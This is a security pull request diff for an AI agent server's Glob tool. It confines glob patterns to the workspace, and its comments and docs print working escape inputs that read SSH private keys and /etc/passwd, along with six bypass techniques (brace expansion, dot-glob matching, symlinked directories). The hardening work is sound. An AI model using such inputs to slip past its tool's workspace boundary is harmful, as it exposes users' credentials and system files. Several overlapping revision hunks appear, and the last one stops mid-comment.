### PR TITLE
security(server): confine the Glob tool's `pattern` to the workspace root

### DIFF
--- a/docs/false-safety-guards.md
+++ b/docs/false-safety-guards.md
@@ -771,3 +771,56 @@ was checked against `--help` on the pinned version for exactly this reason.
   suite — `packages/server/tests/is-entry-point.test.js` and
   `scripts/__tests__/is-entry-point.test.mjs`; the sidecar's inline third copy
   is held only by the drift gate, since it cannot be imported to be tested.
+
+### 15. The denylist for the neighbouring threat, mistaken for containment — `#7341`
+
+**Entry 14 examined this exact guard and did not ask the symmetric question.** It
+asked what `runGrep`'s pattern was protected against. The answer for `runGlob`'s
+pattern turned out to be: nothing, for containment.
+
+`Glob { pattern }` was validated only against `GLOB_PATTERN_SHELL_METACHARS` — a
+*shell-injection* denylist. It permits `~`, `/` and `..`, so
+`Glob {"pattern":"~/.ssh/*"}` returned the user's SSH private keys and
+`{"pattern":"/etc/pass*"}` returned `/etc/passwd`, measured end-to-end through the
+real dispatcher. The sibling field `path` was fully realpath-confined, one function
+away. The permission floor could not catch it either: `PROTECTED_PATH_INPUT_FIELDS`
+is `['file_path','path','notebook_path']`, and `pattern` is not a member — so the
+tool read as *covered* while being an unrestricted read primitive that is
+auto-approved in `acceptEdits`.
+
+The shape: **a real defence against an adjacent class, sitting where containment
+should be, with a comment that says it is validated.** Entry 14 is the same family
+(#7295, shell quoting stopping the shell while the spawned program ran its own
+option parser). Here it is one layer further out — the guard stops injection, and
+injection was never how this tool leaked.
+
+**Three things the fix taught, all of which cost a review round:**
+
+1. *Predicting a shell is not winnable.* The first fix inspected the pattern to
+   work out where it would expand. Six bypasses followed across two rounds:
+   whitespace word-splitting, brace expansion, a glob matching the `..` entry,
+   quote removal, a brace body with no top-level comma, and POSIX bracket
+   sub-expressions. Every one is invisible in the pattern text and plainly visible
+   in the **output**. Confining results needs no model of the shell.
+2. *The more "correct" model was worse.* Replacing the regexes with a real brace
+   expander and a glob-to-regex segment matcher produced **46 wrong answers out of
+   515** enumerated bracket segments — and a denial of service: 4 KB of pattern
+   backtracked for **12.9 seconds** of blocked event loop, returning `null`
+   (accepted), on a tool callable in a loop. Deleting the model fixed both.
+3. *A guard's own escape hatch needs a test.* `catch { return false }` in the
+   confinement had no coverage — flipping it to `return true` passed all 341 tests.
+   A second fail-closed `catch`, added in the same commit whose message boasted
+   about testing the first, was also untested.
+
+**And the test that was itself the defect.** A case written *specifically* as a
+positive control against entry 11's deny-everything shape, and labelled
+`(positive control)`, globbed `*/pass*` and asserted `esc/passwd` was absent — but
+`fs.glob` does not descend a wildcard-matched symlinked directory, so that pattern
+never yields `esc/passwd` under any implementation. It asserted the absence of
+something that was never there and passed with the entire fix deleted. A negative
+assertion needs a **precondition proving the dangerous thing is produced**, or it is
+indistinguishable from a pattern that matched nothing.
+
+**Guard against it:** when a field decides what a tool reads, confine what the tool
+**returns**, not what it was asked for. And when auditing a floor, ask what the tool
+reads — not which of its fields the list happens to scan.

--- a/docs/security/permission-floor.md
+++ b/docs/security/permission-floor.md
@@ -37,6 +37,21 @@ A tool's targets are read from `PROTECTED_PATH_INPUT_FIELDS` (`file_path`, `path
 A tool carrying none of those — `Bash`, `Task`, `WebFetch`, `WebSearch` — cannot be
 floored: command-shaped access is out of scope for a *path* floor.
 
+**A third category the two above do not name** (#7341): a tool that carries a listed
+field *and* an unlisted field which determines its actual reach. `Glob` has both — its
+`path` is floored and fully confined, while its `pattern` decides what the tool
+actually reads and is not a member of `PROTECTED_PATH_INPUT_FIELDS`. Reading the list
+alone would put `Glob` in the "covered" column; it was reading `~/.ssh/*` on main.
+
+`pattern` was deliberately **not** added to the list, and the reason needs to survive
+here rather than in a merged PR description: the field name is shared across tools, and
+`Grep`'s `pattern` is a **regex**, not a path. Flooring it would false-deny ordinary
+searches. Containment for `Glob` therefore lives at the tool, not in the floor —
+`globPatternEscapeReason` for the error message, and confinement of the **results**
+(`confineGlobMatches` on the host, `globMatchEscapesRoot` in the container) for the
+actual boundary. When auditing whether a tool is covered, ask what the tool *reads*,
+not which of its fields the floor happens to scan.
+
 ## 2. Precedence — the floor beats every lenient mode
 
 The floor is checked **before** any short-circuit, on **both** pipelines:

--- a/packages/server/src/built-in-tools/tool-transforms.js
+++ b/packages/server/src/built-in-tools/tool-transforms.js
@@ -311,6 +311,31 @@ export function globPatternEscapeReason(pattern) {
   return null
 }
 
+/**
+ * SECURITY (#7341) — does a glob MATCH, as produced, point outside the root it
+ * was expanded in? Purely lexical, and deliberately so: it inspects what the
+ * expansion ACTUALLY produced instead of predicting what it will produce.
+ *
+ * That distinction is the whole lesson of this fix. Two review rounds found
+ * six ways past a guard that tried to model bash's expansion — quote removal,
+ * whitespace word-splitting, a brace body with no top-level comma, a glob that
+ * matches the `..` entry, POSIX bracket sub-expressions, and nested braces.
+ * Every one of them is invisible in the source text and every one of them is
+ * plainly visible in the OUTPUT, as a leading `/` or a `..` segment. Checking
+ * the output needs no model of the shell and therefore has no round seven.
+ *
+ * The host does strictly better than this (`confineGlobMatches` realpaths each
+ * match), so this is the CONTAINER's boundary: its matches are produced inside
+ * the container where no host realpath can reach them. What it cannot see is a
+ * symlinked directory inside `/workspace` — lexically clean, resolves out. See
+ * `_containerGlob` for that residual.
+ */
+export function globMatchEscapesRoot(match) {
+  if (typeof match !== 'string') return true
+  if (match.startsWith('/')) return true
+  return match.split('/').includes('..')
+}
+
 /** The tool_result message for a pattern rejected by {@link globPatternEscapeReason}. */
 export function globPatternEscapeMessage(reason) {
   return `EINVAL: glob pattern escapes the workspace root (${reason}). Patterns are relative to the workspace; use the "path" argument to search a subdirectory.`
@@ -318,6 +343,14 @@ export function globPatternEscapeMessage(reason) {
 
 /**
  * Build the bash command that lists files matching `pattern` under `root`.
+ *
+ * CONTAINER-ONLY since #7341. The host Glob no longer shells out at all — it
+ * uses `node:fs/promises`'s `glob`, which has no tilde expansion, no word
+ * splitting, no quote removal and no brace-body quirks to model, so the entire
+ * "what will bash do with this string" question disappears. The container
+ * cannot run JS inside itself, so it keeps this, and pairs it with
+ * {@link globMatchEscapesRoot} over the RESULTS.
+ *
  * `pattern` MUST already be validated against GLOB_PATTERN_SHELL_METACHARS AND
  * {@link globPatternEscapeReason} by the caller (it is interpolated unquoted so
  * the shell expands it — that expansion is the whole point, and is also why

--- a/packages/server/src/built-in-tools/tool-transforms.js
+++ b/packages/server/src/built-in-tools/tool-transforms.js
@@ -142,9 +142,66 @@ export function formatNumberedLines(text, { offset, limit, maxLines = DEFAULT_RE
 export const GLOB_PATTERN_SHELL_METACHARS = /[$`;|&><()\\\n\r]/
 
 /**
+ * Word-start positions a bash expansion can begin at inside an interpolated
+ * glob pattern: the start of the pattern, or — because brace expansion runs
+ * FIRST and yields each alternative as its own word — immediately after a
+ * `{` or a `,`. MEASURED (bash 3.2/5.x): `{~,.}/.ssh/config` tilde-expands to
+ * the real home, and `{a,/etc}/passwd` yields `/etc/passwd`. A leading-only
+ * check is therefore bypassable and this must anchor at all three positions.
+ */
+const GLOB_PATTERN_ABSOLUTE = /(^|[{,])\//
+const GLOB_PATTERN_TILDE = /(^|[{,])~/
+/**
+ * A `..` that forms a whole path SEGMENT. Delimited on both sides so an
+ * ordinary filename keeps working: `*~` (emacs backups) and `report..final.md`
+ * are legitimate patterns and must not be rejected — only `..`, `../x`,
+ * `x/../y` and the brace form `{.,..}/x` are traversal.
+ */
+const GLOB_PATTERN_DOTDOT = /(^|[/{,])\.\.($|[/},])/
+
+/**
+ * SECURITY (#7341): reject a Glob `pattern` that can expand OUTSIDE the
+ * workspace root. `GLOB_PATTERN_SHELL_METACHARS` is a *shell-injection*
+ * denylist and was mistaken for containment — it permits `~`, `/` and `..`,
+ * so `Glob {"pattern":"~/.ssh/*"}` and `{"pattern":"../../../../etc/pass*"}`
+ * both returned real files through a tool that is classified read-only and is
+ * therefore auto-approved in `acceptEdits` mode (`ACCEPT_EDITS_TOOLS`),
+ * rule-whitelistable (`ELIGIBLE_TOOLS`) and given only the reduced secrets
+ * floor (`SECRET_READ_FLOOR_TOOLS`). The protected-path floor could not catch
+ * it either: `PROTECTED_PATH_INPUT_FIELDS` is `['file_path','path',
+ * 'notebook_path']` and `pattern` is not a member — the same
+ * guard-one-field-not-its-sibling shape as #7262, here between `Glob`'s
+ * validated `path` and its unvalidated `pattern`.
+ *
+ * This is the SYNTACTIC half of the fix and it is the only half the container
+ * Glob can have (its matches are produced inside the container, out of reach
+ * of a host realpath). The host adds a second, stronger layer: every expanded
+ * match is realpath-checked against the workspace in `runGlob`, which is what
+ * closes the one escape no pattern inspection can see — a symlinked DIRECTORY
+ * inside the workspace (`esc -> /etc`, pattern `esc/pass*`, every character
+ * of which is legal).
+ *
+ * @param {string} pattern
+ * @returns {string|null} A reason string when the pattern can escape, else null.
+ */
+export function globPatternEscapeReason(pattern) {
+  if (GLOB_PATTERN_ABSOLUTE.test(pattern)) return 'absolute path'
+  if (GLOB_PATTERN_TILDE.test(pattern)) return 'home-directory (~) expansion'
+  if (GLOB_PATTERN_DOTDOT.test(pattern)) return 'parent-directory (..) traversal'
+  return null
+}
+
+/** The tool_result message for a pattern rejected by {@link globPatternEscapeReason}. */
+export function globPatternEscapeMessage(reason) {
+  return `EINVAL: glob pattern escapes the workspace root (${reason}). Patterns are relative to the workspace; use the "path" argument to search a subdirectory.`
+}
+
+/**
  * Build the bash command that lists files matching `pattern` under `root`.
- * `pattern` MUST already be validated against GLOB_PATTERN_SHELL_METACHARS by
- * the caller (it is interpolated unquoted so the shell expands it).
+ * `pattern` MUST already be validated against GLOB_PATTERN_SHELL_METACHARS AND
+ * {@link globPatternEscapeReason} by the caller (it is interpolated unquoted so
+ * the shell expands it — that expansion is the whole point, and is also why
+ * containment cannot be delegated to `shellQuote`).
  */
 export function buildGlobCommand(pattern, root) {
   return `shopt -s globstar nullglob; cd ${shellQuote(root)} && for f in ${pattern}; do printf '%s\\n' "$f"; done`

--- a/packages/server/src/built-in-tools/tool-transforms.js
+++ b/packages/server/src/built-in-tools/tool-transforms.js
@@ -142,180 +142,58 @@ export function formatNumberedLines(text, { offset, limit, maxLines = DEFAULT_RE
 export const GLOB_PATTERN_SHELL_METACHARS = /[$`;|&><()\\\n\r]/
 
 /**
- * Ceilings on brace expansion so a `{a,b}{a,b}{a,b}...` bomb cannot make the
- * validator itself the denial of service. Exceeding either is a REJECT, not a
- * skip — "too complex to check" must never mean "checked and fine" (the
- * `docs/false-safety-guards.md` cannot-check-so-nothing-to-check class).
- */
-const GLOB_MAX_BRACE_WORDS = 256
-const GLOB_MAX_BRACE_DEPTH = 8
-
-/**
- * Expand bash brace syntax into the list of words the shell would actually
- * glob. This has to be a REAL expansion, not a set of regexes anchored at `{`
- * and `,`: brace expansion runs FIRST, so `.{.,x}/etc/*` becomes the word
- * `../etc/*` — a traversal whose source text contains no `..` substring at all
- * for a regex to find. MEASURED against bash; the first cut of this guard used
- * anchored regexes and that pattern walked straight through it.
+ * SECURITY (#7341) — reject a Glob `pattern` that OBVIOUSLY escapes the
+ * workspace, so the model gets a clear `EINVAL` instead of a puzzling
+ * "No matches".
  *
- * @returns {string[]|null} The expanded words, or null when a ceiling is hit.
- */
-function expandBraces(word, depth = 0) {
-  if (depth > GLOB_MAX_BRACE_DEPTH) return null
-  const open = word.indexOf('{')
-  if (open === -1) return [word]
-
-  // Find the matching `}` for this `{`, tracking nesting.
-  let level = 0
-  let close = -1
-  for (let i = open; i < word.length; i++) {
-    if (word[i] === '{') level++
-    else if (word[i] === '}') {
-      level--
-      if (level === 0) { close = i; break }
-    }
-  }
-  // Unbalanced `{` — bash leaves it literal, so we do too.
-  if (close === -1) return [word]
-
-  // Split the body on top-level commas only.
-  const body = word.slice(open + 1, close)
-  const alts = []
-  let cur = ''
-  let d = 0
-  for (const ch of body) {
-    if (ch === '{') d++
-    else if (ch === '}') d--
-    if (ch === ',' && d === 0) { alts.push(cur); cur = '' } else cur += ch
-  }
-  alts.push(cur)
-  // A body with no top-level comma is not an expansion in bash (`{a}` stays
-  // literal `{a}`), so keep the braces rather than silently dropping them.
-  if (alts.length === 1) {
-    const rest = expandBraces(word.slice(close + 1), depth + 1)
-    if (rest === null) return null
-    const head = word.slice(0, close + 1)
-    return rest.map((r) => head + r)
-  }
-
-  const prefix = word.slice(0, open)
-  const suffix = word.slice(close + 1)
-  const out = []
-  for (const alt of alts) {
-    const sub = expandBraces(prefix + alt + suffix, depth + 1)
-    if (sub === null) return null
-    for (const w of sub) {
-      if (out.length >= GLOB_MAX_BRACE_WORDS) return null
-      out.push(w)
-    }
-  }
-  return out
-}
-
-/**
- * Does this single path SEGMENT, read as a shell glob, match the string `..`?
+ * THIS IS NOT THE SECURITY BOUNDARY, and the history of the file is the reason
+ * it says so this loudly. It began as one — a check that tried to predict what
+ * bash would do with the pattern — and three review rounds walked past it six
+ * times (whitespace word-splitting, brace expansion, a glob matching the `..`
+ * entry, quote removal, a brace body with no top-level comma, POSIX bracket
+ * sub-expressions). The replacement modelled bash properly: a real brace
+ * expander and a glob-to-regex segment matcher. That was worse. It was
+ * measurably wrong (46 of 515 enumerated bracket segments answered "cannot
+ * reach `..`" for segments bash expands straight to `..`) and it was a denial
+ * of service (a 4 KB pattern of `{a,b}` groups and stars backtracked for 12.9
+ * SECONDS of blocked event loop, on a tool auto-approved in `acceptEdits`).
  *
- * The reason a substring search for `..` is not enough: a glob MATCHES the
- * `..` directory entry. MEASURED on bash 3.2 and 5.x, `.*` expands to `. ..`,
- * so a pattern using `.*` as a DIRECTORY segment twice over reaches
- * `../../etc/passwd` while containing no `..` token at all. `..*` and `.?`
- * match the entry too.
- *
- * The leading-dot rule is what keeps this from rejecting everything: POSIX
- * requires a leading `.` to be matched EXPLICITLY, so `*`, `?` and `[.]*` do
- * NOT match `..` (measured — `[.]*` expands to nothing). Only a segment whose
- * first character is a literal `.` is a candidate, which is why `.env*`,
- * `.github` and `.[a-z]*` keep working while `.*` does not.
- */
-function segmentMatchesDotDot(segment) {
-  if (segment[0] !== '.') return false
-  if (segment === '..') return true
-  let re = ''
-  for (let i = 0; i < segment.length; i++) {
-    const ch = segment[i]
-    if (ch === '*') { re += '[^/]*'; continue }
-    if (ch === '?') { re += '[^/]'; continue }
-    if (ch === '[') {
-      // Scan for the closing `]`. A `]` immediately after `[` or `[!`/`[^` is
-      // a literal member, per POSIX.
-      let j = i + 1
-      if (segment[j] === '!' || segment[j] === '^') j++
-      if (segment[j] === ']') j++
-      while (j < segment.length && segment[j] !== ']') j++
-      if (j >= segment.length) { re += '\\['; continue }   // unterminated — literal `[`
-      const body = segment.slice(i + 1, j).replace(/^!/, '^')
-      re += `[${body}]`
-      i = j
-      continue
-    }
-    re += ch.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')
-  }
-  try {
-    return new RegExp(`^${re}$`).test('..')
-  } catch {
-    return true   // unparseable class — FAIL CLOSED
-  }
-}
-
-/**
- * SECURITY (#7341): reject a Glob `pattern` that can expand OUTSIDE the
- * workspace root. `GLOB_PATTERN_SHELL_METACHARS` is a *shell-injection*
- * denylist and was mistaken for containment — it permits `~`, `/`, `..` and
- * whitespace, so `Glob {"pattern":"~/.ssh/*"}` and
- * `{"pattern":"../../../../etc/pass*"}` both returned real files through a
- * tool that is classified read-only and is therefore auto-approved in
- * `acceptEdits` mode (`ACCEPT_EDITS_TOOLS`), rule-whitelistable
- * (`ELIGIBLE_TOOLS`) and given only the reduced secrets floor
- * (`SECRET_READ_FLOOR_TOOLS`). The protected-path floor could not catch it
- * either: `PROTECTED_PATH_INPUT_FIELDS` is `['file_path','path',
- * 'notebook_path']` and `pattern` is not a member — the same
- * guard-one-field-not-its-sibling shape as #7262, here between `Glob`'s
- * validated `path` and its unvalidated `pattern`.
- *
- * It works on the words bash would actually glob, in bash's own order —
- * whitespace split, then brace expansion, then tilde — because every shortcut
- * short of that has a bypass:
- *   - whitespace: the pattern is interpolated UNQUOTED, so `* /etc/pass*` is
- *     two patterns and the second one escapes. A space can never match a
- *     literal space in a filename here for exactly the same reason, so
- *     rejecting it costs nothing.
- *   - braces: `.{.,x}/etc/*` expands to `../etc/*`, which no regex over the
- *     source text can see.
- *   - globs that match `..`: `.*` matches the `..` entry, so using it as a
- *     directory segment walks up with no `..` token in the source text.
- *
- * This is the SYNTACTIC half of the fix and it is the only half the container
- * Glob can have (its matches are produced inside the container, out of reach
- * of a host realpath). The host adds a second, stronger layer: every expanded
- * match is realpath-confined in `runGlob`, which is what closes the one escape
- * no pattern inspection can see — a symlinked DIRECTORY inside the workspace
- * (`esc -> /etc`, pattern `esc/pass*`, every character of which is legal).
+ * Both problems came from the same source: modelling a shell. So the model is
+ * gone. Containment is enforced entirely on the OUTPUT — `confineGlobMatches`
+ * realpaths every match on the host, `globMatchEscapesRoot` filters every match
+ * on the container — and all six historical bypasses were re-confirmed closed
+ * at that layer, by fuzzing real bash. What remains here is a linear scan whose
+ * only job is a good error message, and which cannot be wrong in a way that
+ * matters: a false negative just yields "No matches" from the layer below.
  *
  * @param {string} pattern
- * @returns {string|null} A reason string when the pattern can escape, else null.
+ * @returns {string|null} A reason string when the pattern obviously escapes.
  */
 export function globPatternEscapeReason(pattern) {
   if (typeof pattern !== 'string') return 'not a string'
-  // Whitespace is rejected on BOTH paths, and deliberately so even though the
-  // host could now support it: the host matches with `fs.glob`, where a space
-  // is an ordinary character, but the container still interpolates the pattern
-  // unquoted into `for f in <pattern>`, where a space splits it into several
-  // patterns. Allowing it host-side would make the SAME input mean two
-  // different things depending on which backend the session runs — which is
-  // the divergence this whole module exists to prevent. `**` reaches into a
-  // directory whose name has a space perfectly well; only a LITERAL space in
-  // the pattern is refused.
+  // Whitespace: the CONTAINER interpolates the pattern unquoted into
+  // `for f in <pattern>`, so a space there is several patterns. Rejected on
+  // both paths so one input cannot mean two things depending on the backend.
   if (/\s/.test(pattern)) {
     return 'whitespace — use ** or a wildcard instead of a literal space'
   }
-  const words = expandBraces(pattern)
-  if (words === null) return 'brace expansion too large to verify'
-  for (const word of words) {
-    if (word.startsWith('~')) return 'home-directory (~) expansion'
-    if (word.startsWith('/')) return 'absolute path'
-    for (const segment of word.split('/')) {
-      if (segmentMatchesDotDot(segment)) return 'parent-directory (..) traversal'
-    }
+  // Word starts: the beginning, or after a `{` or `,` — brace expansion makes
+  // each alternative its own word. No expansion is performed; these anchors are
+  // a cheap approximation, which is all a message needs to be.
+  if (/(^|[{,])~/.test(pattern)) return 'home-directory (~) expansion'
+  if (/(^|[{,])[/\\]/.test(pattern)) return 'absolute path'
+  // Windows: `C:\x`, `C:/x` and the drive-relative `C:x` are all absolute
+  // enough to leave the workspace, and none of them starts with a separator.
+  // #6928 is the same lesson one layer down — a `/`-shaped path evading a
+  // guard that only knew about `\`, or the reverse.
+  if (/(^|[{,])[A-Za-z]:/.test(pattern)) return 'absolute path'
+  // A literal `..` path segment. Segments are delimited by either separator
+  // and by brace punctuation. This deliberately does NOT try to work out
+  // whether a glob such as `.*` could EXPAND to `..` — that computation is
+  // what produced both the false accepts and the DoS, and the output layer
+  // catches the real thing regardless.
+  for (const segment of pattern.split(/[/\\{},]/)) {
+    if (segment === '..') return 'parent-directory (..) traversal'
   }
   return null
 }
@@ -341,8 +219,13 @@ export function globPatternEscapeReason(pattern) {
  */
 export function globMatchEscapesRoot(match) {
   if (typeof match !== 'string') return true
-  if (match.startsWith('/')) return true
-  return match.split('/').includes('..')
+  // Both separators and the Windows drive/UNC forms. Splitting on `/` alone is
+  // #6928 exactly — a guard that knew one separator and let the other through.
+  // The container is Linux today, so the Windows arms are contract rather than
+  // live defence; a validator whose JSDoc claims "absolute" must mean it.
+  if (/^[/\\]/.test(match)) return true
+  if (/^[A-Za-z]:/.test(match)) return true
+  return match.split(/[/\\]/).includes('..')
 }
 
 /** The tool_result message for a pattern rejected by {@link globPatternEscapeReason}. */

--- a/packages/server/src/built-in-tools/tool-transforms.js
+++ b/packages/server/src/built-in-tools/tool-transforms.js
@@ -296,8 +296,17 @@ function segmentMatchesDotDot(segment) {
  */
 export function globPatternEscapeReason(pattern) {
   if (typeof pattern !== 'string') return 'not a string'
+  // Whitespace is rejected on BOTH paths, and deliberately so even though the
+  // host could now support it: the host matches with `fs.glob`, where a space
+  // is an ordinary character, but the container still interpolates the pattern
+  // unquoted into `for f in <pattern>`, where a space splits it into several
+  // patterns. Allowing it host-side would make the SAME input mean two
+  // different things depending on which backend the session runs — which is
+  // the divergence this whole module exists to prevent. `**` reaches into a
+  // directory whose name has a space perfectly well; only a LITERAL space in
+  // the pattern is refused.
   if (/\s/.test(pattern)) {
-    return 'whitespace (unquoted, the shell would read it as several patterns)'
+    return 'whitespace — use ** or a wildcard instead of a literal space'
   }
   const words = expandBraces(pattern)
   if (words === null) return 'brace expansion too large to verify'

--- a/packages/server/src/built-in-tools/tool-transforms.js
+++ b/packages/server/src/built-in-tools/tool-transforms.js
@@ -142,52 +142,172 @@ export function formatNumberedLines(text, { offset, limit, maxLines = DEFAULT_RE
 export const GLOB_PATTERN_SHELL_METACHARS = /[$`;|&><()\\\n\r]/
 
 /**
- * Word-start positions a bash expansion can begin at inside an interpolated
- * glob pattern: the start of the pattern, or — because brace expansion runs
- * FIRST and yields each alternative as its own word — immediately after a
- * `{` or a `,`. MEASURED (bash 3.2/5.x): `{~,.}/.ssh/config` tilde-expands to
- * the real home, and `{a,/etc}/passwd` yields `/etc/passwd`. A leading-only
- * check is therefore bypassable and this must anchor at all three positions.
+ * Ceilings on brace expansion so a `{a,b}{a,b}{a,b}...` bomb cannot make the
+ * validator itself the denial of service. Exceeding either is a REJECT, not a
+ * skip — "too complex to check" must never mean "checked and fine" (the
+ * `docs/false-safety-guards.md` cannot-check-so-nothing-to-check class).
  */
-const GLOB_PATTERN_ABSOLUTE = /(^|[{,])\//
-const GLOB_PATTERN_TILDE = /(^|[{,])~/
+const GLOB_MAX_BRACE_WORDS = 256
+const GLOB_MAX_BRACE_DEPTH = 8
+
 /**
- * A `..` that forms a whole path SEGMENT. Delimited on both sides so an
- * ordinary filename keeps working: `*~` (emacs backups) and `report..final.md`
- * are legitimate patterns and must not be rejected — only `..`, `../x`,
- * `x/../y` and the brace form `{.,..}/x` are traversal.
+ * Expand bash brace syntax into the list of words the shell would actually
+ * glob. This has to be a REAL expansion, not a set of regexes anchored at `{`
+ * and `,`: brace expansion runs FIRST, so `.{.,x}/etc/*` becomes the word
+ * `../etc/*` — a traversal whose source text contains no `..` substring at all
+ * for a regex to find. MEASURED against bash; the first cut of this guard used
+ * anchored regexes and that pattern walked straight through it.
+ *
+ * @returns {string[]|null} The expanded words, or null when a ceiling is hit.
  */
-const GLOB_PATTERN_DOTDOT = /(^|[/{,])\.\.($|[/},])/
+function expandBraces(word, depth = 0) {
+  if (depth > GLOB_MAX_BRACE_DEPTH) return null
+  const open = word.indexOf('{')
+  if (open === -1) return [word]
+
+  // Find the matching `}` for this `{`, tracking nesting.
+  let level = 0
+  let close = -1
+  for (let i = open; i < word.length; i++) {
+    if (word[i] === '{') level++
+    else if (word[i] === '}') {
+      level--
+      if (level === 0) { close = i; break }
+    }
+  }
+  // Unbalanced `{` — bash leaves it literal, so we do too.
+  if (close === -1) return [word]
+
+  // Split the body on top-level commas only.
+  const body = word.slice(open + 1, close)
+  const alts = []
+  let cur = ''
+  let d = 0
+  for (const ch of body) {
+    if (ch === '{') d++
+    else if (ch === '}') d--
+    if (ch === ',' && d === 0) { alts.push(cur); cur = '' } else cur += ch
+  }
+  alts.push(cur)
+  // A body with no top-level comma is not an expansion in bash (`{a}` stays
+  // literal `{a}`), so keep the braces rather than silently dropping them.
+  if (alts.length === 1) {
+    const rest = expandBraces(word.slice(close + 1), depth + 1)
+    if (rest === null) return null
+    const head = word.slice(0, close + 1)
+    return rest.map((r) => head + r)
+  }
+
+  const prefix = word.slice(0, open)
+  const suffix = word.slice(close + 1)
+  const out = []
+  for (const alt of alts) {
+    const sub = expandBraces(prefix + alt + suffix, depth + 1)
+    if (sub === null) return null
+    for (const w of sub) {
+      if (out.length >= GLOB_MAX_BRACE_WORDS) return null
+      out.push(w)
+    }
+  }
+  return out
+}
+
+/**
+ * Does this single path SEGMENT, read as a shell glob, match the string `..`?
+ *
+ * The reason a substring search for `..` is not enough: a glob MATCHES the
+ * `..` directory entry. MEASURED on bash 3.2 and 5.x, `.*` expands to `. ..`,
+ * so a pattern using `.*` as a DIRECTORY segment twice over reaches
+ * `../../etc/passwd` while containing no `..` token at all. `..*` and `.?`
+ * match the entry too.
+ *
+ * The leading-dot rule is what keeps this from rejecting everything: POSIX
+ * requires a leading `.` to be matched EXPLICITLY, so `*`, `?` and `[.]*` do
+ * NOT match `..` (measured — `[.]*` expands to nothing). Only a segment whose
+ * first character is a literal `.` is a candidate, which is why `.env*`,
+ * `.github` and `.[a-z]*` keep working while `.*` does not.
+ */
+function segmentMatchesDotDot(segment) {
+  if (segment[0] !== '.') return false
+  if (segment === '..') return true
+  let re = ''
+  for (let i = 0; i < segment.length; i++) {
+    const ch = segment[i]
+    if (ch === '*') { re += '[^/]*'; continue }
+    if (ch === '?') { re += '[^/]'; continue }
+    if (ch === '[') {
+      // Scan for the closing `]`. A `]` immediately after `[` or `[!`/`[^` is
+      // a literal member, per POSIX.
+      let j = i + 1
+      if (segment[j] === '!' || segment[j] === '^') j++
+      if (segment[j] === ']') j++
+      while (j < segment.length && segment[j] !== ']') j++
+      if (j >= segment.length) { re += '\\['; continue }   // unterminated — literal `[`
+      const body = segment.slice(i + 1, j).replace(/^!/, '^')
+      re += `[${body}]`
+      i = j
+      continue
+    }
+    re += ch.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')
+  }
+  try {
+    return new RegExp(`^${re}$`).test('..')
+  } catch {
+    return true   // unparseable class — FAIL CLOSED
+  }
+}
 
 /**
  * SECURITY (#7341): reject a Glob `pattern` that can expand OUTSIDE the
  * workspace root. `GLOB_PATTERN_SHELL_METACHARS` is a *shell-injection*
- * denylist and was mistaken for containment — it permits `~`, `/` and `..`,
- * so `Glob {"pattern":"~/.ssh/*"}` and `{"pattern":"../../../../etc/pass*"}`
- * both returned real files through a tool that is classified read-only and is
- * therefore auto-approved in `acceptEdits` mode (`ACCEPT_EDITS_TOOLS`),
- * rule-whitelistable (`ELIGIBLE_TOOLS`) and given only the reduced secrets
- * floor (`SECRET_READ_FLOOR_TOOLS`). The protected-path floor could not catch
- * it either: `PROTECTED_PATH_INPUT_FIELDS` is `['file_path','path',
+ * denylist and was mistaken for containment — it permits `~`, `/`, `..` and
+ * whitespace, so `Glob {"pattern":"~/.ssh/*"}` and
+ * `{"pattern":"../../../../etc/pass*"}` both returned real files through a
+ * tool that is classified read-only and is therefore auto-approved in
+ * `acceptEdits` mode (`ACCEPT_EDITS_TOOLS`), rule-whitelistable
+ * (`ELIGIBLE_TOOLS`) and given only the reduced secrets floor
+ * (`SECRET_READ_FLOOR_TOOLS`). The protected-path floor could not catch it
+ * either: `PROTECTED_PATH_INPUT_FIELDS` is `['file_path','path',
  * 'notebook_path']` and `pattern` is not a member — the same
  * guard-one-field-not-its-sibling shape as #7262, here between `Glob`'s
  * validated `path` and its unvalidated `pattern`.
  *
+ * It works on the words bash would actually glob, in bash's own order —
+ * whitespace split, then brace expansion, then tilde — because every shortcut
+ * short of that has a bypass:
+ *   - whitespace: the pattern is interpolated UNQUOTED, so `* /etc/pass*` is
+ *     two patterns and the second one escapes. A space can never match a
+ *     literal space in a filename here for exactly the same reason, so
+ *     rejecting it costs nothing.
+ *   - braces: `.{.,x}/etc/*` expands to `../etc/*`, which no regex over the
+ *     source text can see.
+ *   - globs that match `..`: `.*` matches the `..` entry, so using it as a
+ *     directory segment walks up with no `..` token in the source text.
+ *
  * This is the SYNTACTIC half of the fix and it is the only half the container
  * Glob can have (its matches are produced inside the container, out of reach
  * of a host realpath). The host adds a second, stronger layer: every expanded
- * match is realpath-checked against the workspace in `runGlob`, which is what
- * closes the one escape no pattern inspection can see — a symlinked DIRECTORY
- * inside the workspace (`esc -> /etc`, pattern `esc/pass*`, every character
- * of which is legal).
+ * match is realpath-confined in `runGlob`, which is what closes the one escape
+ * no pattern inspection can see — a symlinked DIRECTORY inside the workspace
+ * (`esc -> /etc`, pattern `esc/pass*`, every character of which is legal).
  *
  * @param {string} pattern
  * @returns {string|null} A reason string when the pattern can escape, else null.
  */
 export function globPatternEscapeReason(pattern) {
-  if (GLOB_PATTERN_ABSOLUTE.test(pattern)) return 'absolute path'
-  if (GLOB_PATTERN_TILDE.test(pattern)) return 'home-directory (~) expansion'
-  if (GLOB_PATTERN_DOTDOT.test(pattern)) return 'parent-directory (..) traversal'
+  if (typeof pattern !== 'string') return 'not a string'
+  if (/\s/.test(pattern)) {
+    return 'whitespace (unquoted, the shell would read it as several patterns)'
+  }
+  const words = expandBraces(pattern)
+  if (words === null) return 'brace expansion too large to verify'
+  for (const word of words) {
+    if (word.startsWith('~')) return 'home-directory (~) expansion'
+    if (word.startsWith('/')) return 'absolute path'
+    for (const segment of word.split('/')) {
+      if (segmentMatchesDotDot(segment)) return 'parent-directory (..) traversal'
+    }
+  }
   return null
 }
 

--- a/packages/server/src/byok-tool-executor.js
+++ b/packages/server/src/byok-tool-executor.js
@@ -48,10 +48,18 @@ import { isPrivateOrSpecialIp } from './ssrf-guard.js'
 const BASH_TIMEOUT_CEILING_MS = 600_000
 
 /**
- * Cap on how many matches Glob collects. The shell implementation was bounded
- * only by executeBash's ~1MB stdout cap; this makes the same bound explicit so
- * a `**\/*` over a node_modules tree cannot balloon the session's memory.
+ * Two bounds, because they do different jobs.
+ *
+ * `GLOB_COLLECT_CEILING` is the memory backstop on the walk. `GLOB_MAX_MATCHES`
+ * is how many paths the model is shown. Collecting more than we return is what
